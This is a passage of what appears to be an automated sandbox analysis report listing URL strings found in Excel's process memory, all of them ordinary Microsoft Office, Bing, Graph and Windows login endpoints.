      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechi
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: EXCEL.EXE, 00000000.00000002.543306954.0000000012E40000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android(E
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOf
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/https://graph.ppe.windows.net
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://graph.windows.net
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://graph.windows.net/
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/https://graph.windows.net
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.netse
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetryOfficeOnlineContenthttps://insertmedia.
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetryi
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: EXCEL.EXE, 00000000.00000002.543668539.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350357731.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383432005.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459478979.0000000013090000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397090354.0000000013090000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3dips
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EXCEL.EXE, 00000000.00000002.543306954.0000000012E40000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: EXCEL.EXE, 00000000.00000003.263363412.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350133174.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397386669.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383712060.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459326223.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463180999.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460536369.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262945436.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396836402.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543940616.0000000013175000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1BD
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000000.00000003.263363412.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350133174.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397386669.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383712060.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459326223.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463180999.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460536369.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262945436.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396836402.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543940616.0000000013175000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?OfficeOnlineContentM365Iconshttps://hu
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientl
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstoreGdw
      Source: EXCEL.EXE, 00000000.00000002.543306954.0000000012E40000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppqq
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: EXCEL.EXE, 00000000.00000003.383523554.00000000130D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459554867.00000000130D0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTofficeapps.
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia_I
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech(
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://lifecycle.office.com
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comMBI_SSL_SHORThttps://lifecycle.office.com
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comP
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://login.windows.local
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$2
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$c
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%3
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-R
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/f
